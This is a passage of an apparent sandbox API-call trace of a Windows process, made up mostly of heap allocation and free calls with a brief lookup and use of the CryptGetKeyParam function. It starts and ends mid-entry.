(HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0178.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0178.479] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0178.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.480] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.480] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0178.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.481] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.482] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.482] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0178.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0178.483] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0178.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0178.484] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d440, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.484] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0178.485] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c28c8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c28c8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0178.486] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0178.486] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 